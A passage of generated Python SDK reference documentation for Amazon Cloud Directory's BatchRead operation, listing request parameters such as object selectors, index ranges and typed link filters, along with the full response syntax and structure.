(string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nNextToken (string) --The pagination token.\n\nMaxResults (integer) --The maximum number of results to retrieve.\n\n\n\nListObjectParentPaths (dict) --Retrieves all available parent paths for any object type such as node, leaf node, policy node, and index node objects. For more information about objects, see Directory Structure .\n\nObjectReference (dict) -- [REQUIRED]The reference that identifies the object whose attributes will be listed.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nNextToken (string) --The pagination token.\n\nMaxResults (integer) --The maximum number of results to retrieve.\n\n\n\nGetObjectInformation (dict) --Retrieves metadata about an object.\n\nObjectReference (dict) -- [REQUIRED]A reference to the object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\n\n\nGetObjectAttributes (dict) --Retrieves attributes within a facet that are associated with an object.\n\nObjectReference (dict) -- [REQUIRED]Reference that identifies the object whose attributes will be retrieved.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nSchemaFacet (dict) -- [REQUIRED]Identifier for the facet whose attributes will be retrieved. See SchemaFacet for details.\n\nSchemaArn (string) --The ARN of the schema that contains the facet with no minor component. See arns and In-Place Schema Upgrade for a description of when to provide minor versions.\n\nFacetName (string) --The name of the facet.\n\n\n\nAttributeNames (list) -- [REQUIRED]List of attribute names whose values will be retrieved.\n\n(string) --\n\n\n\n\nListObjectParents (dict) --\nObjectReference (dict) -- [REQUIRED]The reference that identifies an object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nNextToken (string) --\nMaxResults (integer) --\n\n\nListObjectPolicies (dict) --Returns policies attached to an object in pagination fashion.\n\nObjectReference (dict) -- [REQUIRED]The reference that identifies the object whose attributes will be listed.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nNextToken (string) --The pagination token.\n\nMaxResults (integer) --The maximum number of results to retrieve.\n\n\n\nListPolicyAttachments (dict) --Returns all of the ObjectIdentifiers to which a given policy is attached.\n\nPolicyReference (dict) -- [REQUIRED]The reference that identifies the policy object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nNextToken (string) --The pagination token.\n\nMaxResults (integer) --The maximum number of results to retrieve.\n\n\n\nLookupPolicy (dict) --Lists all policies from the root of the Directory to the object specified. If there are no policies present, an empty list is returned. If policies are present, and if some objects don\'t have the policies attached, it returns the ObjectIdentifier for such objects. If policies are present, it returns ObjectIdentifier , policyId , and policyType . Paths that don\'t lead to the root from the target object are ignored. For more information, see Policies .\n\nObjectReference (dict) -- [REQUIRED]Reference that identifies the object whose policies will be looked up.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nNextToken (string) --The pagination token.\n\nMaxResults (integer) --The maximum number of results to retrieve.\n\n\n\nListIndex (dict) --Lists objects attached to the specified index.\n\nRangesOnIndexedValues (list) --Specifies the ranges of indexed values that you want to query.\n\n(dict) --A range of attributes.\n\nAttributeKey (dict) --The key of the attribute that the attribute range covers.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.\n\nFacetName (string) -- [REQUIRED]The name of the facet that the attribute exists within.\n\nName (string) -- [REQUIRED]The name of the attribute.\n\n\n\nRange (dict) --The range of attribute values being selected.\n\nStartMode (string) -- [REQUIRED]The inclusive or exclusive range start.\n\nStartValue (dict) --The value to start the range at.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\nEndMode (string) -- [REQUIRED]The inclusive or exclusive range end.\n\nEndValue (dict) --The attribute value to terminate the range at.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n\nIndexReference (dict) -- [REQUIRED]The reference to the index to list.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nMaxResults (integer) --The maximum number of results to retrieve.\n\nNextToken (string) --The pagination token.\n\n\n\nListOutgoingTypedLinks (dict) --Returns a paginated list of all the outgoing TypedLinkSpecifier information for an object. It also supports filtering by typed link facet and identity attributes. For more information, see Typed Links .\n\nObjectReference (dict) -- [REQUIRED]The reference that identifies the object whose attributes will be listed.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nFilterAttributeRanges (list) --Provides range filters for multiple attributes. When providing ranges to typed link selection, any inexact ranges must be specified at the end. Any attributes that do not have a range specified are presumed to match the entire range.\n\n(dict) --Identifies the range of attributes that are used by a specified filter.\n\nAttributeName (string) --The unique name of the typed link attribute.\n\nRange (dict) -- [REQUIRED]The range of attribute values that are being selected.\n\nStartMode (string) -- [REQUIRED]The inclusive or exclusive range start.\n\nStartValue (dict) --The value to start the range at.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\nEndMode (string) -- [REQUIRED]The inclusive or exclusive range end.\n\nEndValue (dict) --The attribute value to terminate the range at.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n\nFilterTypedLink (dict) --Filters are interpreted in the order of the attributes defined on the typed link facet, not the order they are supplied to any API calls.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .\n\nTypedLinkName (string) -- [REQUIRED]The unique name of the typed link facet.\n\n\n\nNextToken (string) --The pagination token.\n\nMaxResults (integer) --The maximum number of results to retrieve.\n\n\n\nListIncomingTypedLinks (dict) --Returns a paginated list of all the incoming TypedLinkSpecifier information for an object. It also supports filtering by typed link facet and identity attributes. For more information, see Typed Links .\n\nObjectReference (dict) -- [REQUIRED]The reference that identifies the object whose attributes will be listed.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nFilterAttributeRanges (list) --Provides range filters for multiple attributes. When providing ranges to typed link selection, any inexact ranges must be specified at the end. Any attributes that do not have a range specified are presumed to match the entire range.\n\n(dict) --Identifies the range of attributes that are used by a specified filter.\n\nAttributeName (string) --The unique name of the typed link attribute.\n\nRange (dict) -- [REQUIRED]The range of attribute values that are being selected.\n\nStartMode (string) -- [REQUIRED]The inclusive or exclusive range start.\n\nStartValue (dict) --The value to start the range at.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\nEndMode (string) -- [REQUIRED]The inclusive or exclusive range end.\n\nEndValue (dict) --The attribute value to terminate the range at.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n\nFilterTypedLink (dict) --Filters are interpreted in the order of the attributes on the typed link facet, not the order in which they are supplied to any API calls.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .\n\nTypedLinkName (string) -- [REQUIRED]The unique name of the typed link facet.\n\n\n\nNextToken (string) --The pagination token.\n\nMaxResults (integer) --The maximum number of results to retrieve.\n\n\n\nGetLinkAttributes (dict) --Retrieves attributes that are associated with a typed link.\n\nTypedLinkSpecifier (dict) -- [REQUIRED]Allows a typed link specifier to be accepted as input.\n\nTypedLinkFacet (dict) -- [REQUIRED]Identifies the typed link facet that is associated with the typed link.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .\n\nTypedLinkName (string) -- [REQUIRED]The unique name of the typed link facet.\n\n\n\nSourceObjectReference (dict) -- [REQUIRED]Identifies the source object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nTargetObjectReference (dict) -- [REQUIRED]Identifies the target object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nIdentityAttributeValues (list) -- [REQUIRED]Identifies the attribute value to update.\n\n(dict) --Identifies the attribute name and value for a typed link.\n\nAttributeName (string) -- [REQUIRED]The attribute name of the typed link.\n\nValue (dict) -- [REQUIRED]The value for the typed link.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n\nAttributeNames (list) -- [REQUIRED]A list of attribute names whose values will be retrieved.\n\n(string) --\n\n\n\n\n\n\n\n
:type ConsistencyLevel: string
:param ConsistencyLevel: Represents the manner and timing in which the successful write or update of an object is reflected in a subsequent read operation of that same object.
:rtype: dict
ReturnsResponse Syntax
{
'Responses': [
{
'SuccessfulResponse': {
'ListObjectAttributes': {
'Attributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
],
'NextToken': 'string'
},
'ListObjectChildren': {
'Children': {
'string': 'string'
},
'NextToken': 'string'
},
'GetObjectInformation': {
'SchemaFacets': [
{
'SchemaArn': 'string',
'FacetName': 'string'
},
],
'ObjectIdentifier': 'string'
},
'GetObjectAttributes': {
'Attributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
'ListAttachedIndices': {
'IndexAttachments': [
{
'IndexedAttributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
],
'ObjectIdentifier': 'string'
},
],
'NextToken': 'string'
},
'ListObjectParentPaths': {
'PathToObjectIdentifiersList': [
{
'Path': 'string',
'ObjectIdentifiers': [
'string',
]
},
],
'NextToken': 'string'
},
'ListObjectPolicies': {
'AttachedPolicyIds': [
'string',
],
'NextToken': 'string'
},
'ListPolicyAttachments': {
'ObjectIdentifiers': [
'string',
],
'NextToken': 'string'
},
'LookupPolicy': {
'PolicyToPathList': [
{
'Path': 'string',
'Policies': [
{
'PolicyId': 'string',
'ObjectIdentifier': 'string',
'PolicyType': 'string'
},
]
},
],
'NextToken': 'string'
},
'ListIndex': {
'IndexAttachments': [
{
'IndexedAttributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
],
'ObjectIdentifier': 'string'
},
],
'NextToken': 'string'
},
'ListOutgoingTypedLinks': {
'TypedLinkSpecifiers': [
{
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
],
'NextToken': 'string'
},
'ListIncomingTypedLinks': {
'LinkSpecifiers': [
{
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
],
'NextToken': 'string'
},
'GetLinkAttributes': {
'Attributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
'ListObjectParents': {
'ParentLinks': [
{
'ObjectIdentifier': 'string',
'LinkName': 'string'
},
],
'NextToken': 'string'
}
},
'ExceptionResponse': {
'Type': 'ValidationException'|'InvalidArnException'|'ResourceNotFoundException'|'InvalidNextTokenException'|'AccessDeniedException'|'NotNodeException'|'FacetValidationException'|'CannotListParentOfRootException'|'NotIndexException'|'NotPolicyException'|'DirectoryNotEnabledException'|'LimitExceededException'|'InternalServiceException',
'Message': 'string'
}
},
]
}
Response Structure
(dict) --
Responses (list) --
A list of all the responses for each batch read.
(dict) --
Represents the output of a BatchRead response operation.
SuccessfulResponse (dict) --
Identifies which operation in a batch has succeeded.
ListObjectAttributes (dict) --
Lists all attributes that are associated with an object.
Attributes (list) --
The attributes map that is associated with the object. AttributeArn is the key; attribute value is the value.
(dict) --
The combination of an attribute key and an attribute value.
Key (dict) --
The key of the attribute.
SchemaArn (string) --
The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.
FacetName (string) --
The name of the facet that the attribute exists within.
Name (string) --
The name of the attribute.
Value (dict) --
The value of the attribute.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
NextToken (string) --
The pagination token.
ListObjectChildren (dict) --
Returns a paginated list of child objects that are associated with a given object.
Children (dict) --
The children structure, which is a map with the key as the LinkName and ObjectIdentifier as the value.
(string) --
(string) --
NextToken (string) --
The pagination token.
GetObjectInformation (dict) --
Retrieves metadata about an object.
SchemaFacets (list) --
The facets attached to the specified object.
(dict) --
A facet.
SchemaArn (string) --
The ARN of the schema that contains the facet with no minor component. See arns and In-Place Schema Upgrade for a description of when to provide minor versions.
FacetName (string) --
The name of the facet.
ObjectIdentifier (string) --
The ObjectIdentifier of the specified object.
GetObjectAttributes (dict) --
Retrieves attributes within a facet that are associated with an object.
Attributes (list) --
The attribute values that are associated with an object.
(dict) --
The combination of an attribute key and an attribute value.
Key (dict) --
The key of the attribute.
SchemaArn (string) --
The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.
FacetName (string) --
The name of the facet that the attribute exists within.
Name (string) --
The name of the attribute.
Value (dict) --
The value of the attribute.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
ListAttachedIndices (dict) --
Lists indices attached to an object.
IndexAttachments (list) --
The indices attached to the specified object.
(dict) --
Represents an index and an attached object.
IndexedAttributes (list) --
The indexed attribute values.
(dict) --
The combination of an attribute key and an attribute value.
Key (dict) --
The key of the attribute.
SchemaArn (string) --
The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.
FacetName (string) --
The name of the facet that the attribute exists within.
Name (string) --
The name of the attribute.
Value (dict) --
The value of the attribute.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
ObjectIdentifier (string) --
In response to ListIndex , the ObjectIdentifier of the object attached to the index. In response to ListAttachedIndices , the ObjectIdentifier of the index attached to the object. This field will always contain the ObjectIdentifier of the object on the opposite side of the attachment specified in the query.
NextToken (string) --
The pagination token.
ListObjectParentPaths (dict) --
Retrieves all available parent paths for any object type such as node, leaf node, policy node, and index node objects. For more information about objects, see Directory Structure .
PathToObjectIdentifiersList (list) --
Returns the path to the ObjectIdentifiers that are associated with the directory.
(dict) --
Returns the path to the ObjectIdentifiers that is associated with the directory.
Path (string) --
The path that is used to identify the object starting from directory root.
ObjectIdentifiers (list) --
Lists ObjectIdentifiers starting from directory root to the object in the request.
(string) --
NextToken (string) --
The pagination token.
ListObjectPolicies (dict) --
Returns policies attached to an object in pagination fashion.
AttachedPolicyIds (list) --
A list of policy ObjectIdentifiers , that are attached to the object.
(string) --
NextToken (string) --
The pagination token.
ListPolicyAttachments (dict) --
Returns all of the ObjectIdentifiers to which a given policy is attached.
ObjectIdentifiers (list) --
A list of ObjectIdentifiers to which the policy is attached.
(string) --
NextToken (string) --
The pagination token.
LookupPolicy (dict) --
Lists all policies from the root of the Directory to the object specified. If there are no policies present, an empty list is returned. If policies are present, and if some objects don\'t have the policies attached, it returns the ObjectIdentifier for such objects. If policies are present, it returns ObjectIdentifier , policyId , and policyType . Paths that don\'t lead to the root from the target object are ignored. For more information, see Policies .
PolicyToPathList (list) --
Provides list of path to policies. Policies contain PolicyId , ObjectIdentifier , and PolicyType . For more information, see Policies .
(dict) --
Used when a regular object exists in a Directory and you want to find all of the policies that are associated with that object and the parent to that object.
Path (string) --
The path that is referenced from the root.
Policies (list) --
List of policy objects.
(dict) --
Contains the PolicyType , PolicyId , and the ObjectIdentifier to which it is attached. For more information, see Policies .
PolicyId (string) --
The ID of PolicyAttachment .
ObjectIdentifier (string) --
The ObjectIdentifier that is associated with PolicyAttachment .
PolicyType (string) --
The type of policy that can be associated with PolicyAttachment .
NextToken (string) --
The pagination token.
ListIndex (dict) --
Lists objects attached to the specified index.
IndexAttachments (list) --
The objects and indexed values attached to the index.
(dict) --
Represents an index and an attached object.
IndexedAttributes (list) --
The indexed attribute values.
(dict) --
The combination of an attribute key and an attribute value.
Key (dict) --
The key of the attribute.
SchemaArn (string) --
The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.
FacetName (string) --
The name of the facet that the attribute exists within.
Name (string) --
The name of the attribute.
Value (dict) --
The value of the attribute.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
ObjectIdentifier (string) --
In response to ListIndex , the ObjectIdentifier of the object attached to the index. In response to ListAttachedIndices , the ObjectIdentifier of the index attached to the object. This field will always contain the ObjectIdentifier of the object on the opposite side of the attachment specified in the query.
NextToken (string) --
The pagination token.
ListOutgoingTypedLinks (dict) --
Returns a paginated list of all the outgoing TypedLinkSpecifier information for an object. It also supports filtering by typed link facet and identity attributes. For more information, see Typed Links .
TypedLinkSpecifiers (list) --
Returns a typed link specifier as output.
(dict) --
Contains all the information that is used to uniquely identify a typed link. The parameters discussed in this topic are used to uniquely specify the typed link being operated on. The AttachTypedLink API returns a typed link specifier while the DetachTypedLink API accepts one as input. Similarly, the ListIncomingTypedLinks and ListOutgoingTypedLinks API operations provide typed link specifiers as output. You can also construct a typed link specifier from scratch.
TypedLinkFacet (dict) --
Identifies the typed link facet that is associated with the typed link.
SchemaArn (string) --
The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .
TypedLinkName (string) --
The unique name of the typed link facet.
SourceObjectReference (dict) --
Identifies the source object that the typed link will attach to.
Selector (string) --
A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
TargetObjectReference (dict) --
Identifies the target object that the typed link will attach to.
Selector (string) --
A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
IdentityAttributeValues (list) --
Identifies the attribute value to update.
(dict) --
Identifies the attribute name and value for a typed link.
AttributeName (string) --
The attribute name of the typed link.
Value (dict) --
The value for the typed link.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
NextToken (string) --
The pagination token.
ListIncomingTypedLinks (dict) --
Returns a paginated list of all the incoming TypedLinkSpecifier information for an object. It also supports filtering by typed link facet and identity attributes. For more information, see Typed Links .
LinkSpecifiers (list) --
Returns one or more typed link specifiers as output.
(dict) --
Contains all the information that is used to uniquely identify a typed link. The parameters discussed in this topic are used to uniquely specify the typed link being operated on. The AttachTypedLink API returns a typed link specifier while the DetachTypedLink API accepts one as input. Similarly, the ListIncomingTypedLinks and ListOutgoingTypedLinks API operations provide typed link specifiers as output. You can also construct a typed link specifier from scratch.
TypedLinkFacet (dict) --
Identifies the typed link facet that is associated with the typed link.
SchemaArn (string) --
The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .
TypedLinkName (string) --
The unique name of the typed link facet.
SourceObjectReference (dict) --
Identifies the source object that the typed link will attach to.
Selector (string) --
A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
TargetObjectReference (dict) --
Identifies the target object that the typed link will attach to.
Selector (string) --
A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
IdentityAttributeValues (list) --
Identifies the attribute value to update.
(dict) --
Identifies the attribute name and value for a typed link.
AttributeName (string) --
The attribute name of the typed link.
Value (dict) --
The value for the typed link.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
NextToken (string) --
The pagination token.
GetLinkAttributes (dict) --
The list of attributes to retrieve from the typed link.
Attributes (list) --
The attributes that are associated with the typed link.
(dict) --
The combination of an attribute key and an attribute value.
Key (dict) --
The key of the attribute.
SchemaArn (string) --
The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.
FacetName (string) --
The name of the facet that the attribute exists within.
Name (string) --
The name of the attribute.
Value (dict) --
The value of the attribute.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
ListObjectParents (dict) --
ParentLinks (list) --
(dict) --
A pair of ObjectIdentifier and LinkName.
ObjectIdentifier (string) --
The ID that is associated with the object.
LinkName (string) --
The name of the link between the parent and the child object.
NextToken (string) --
ExceptionResponse (dict) --
Identifies which operation in a batch has failed.
Type (string) --
A type of exception, such as InvalidArnException .
Message (string) --
An exception message that is associated with the failure.
Exceptions
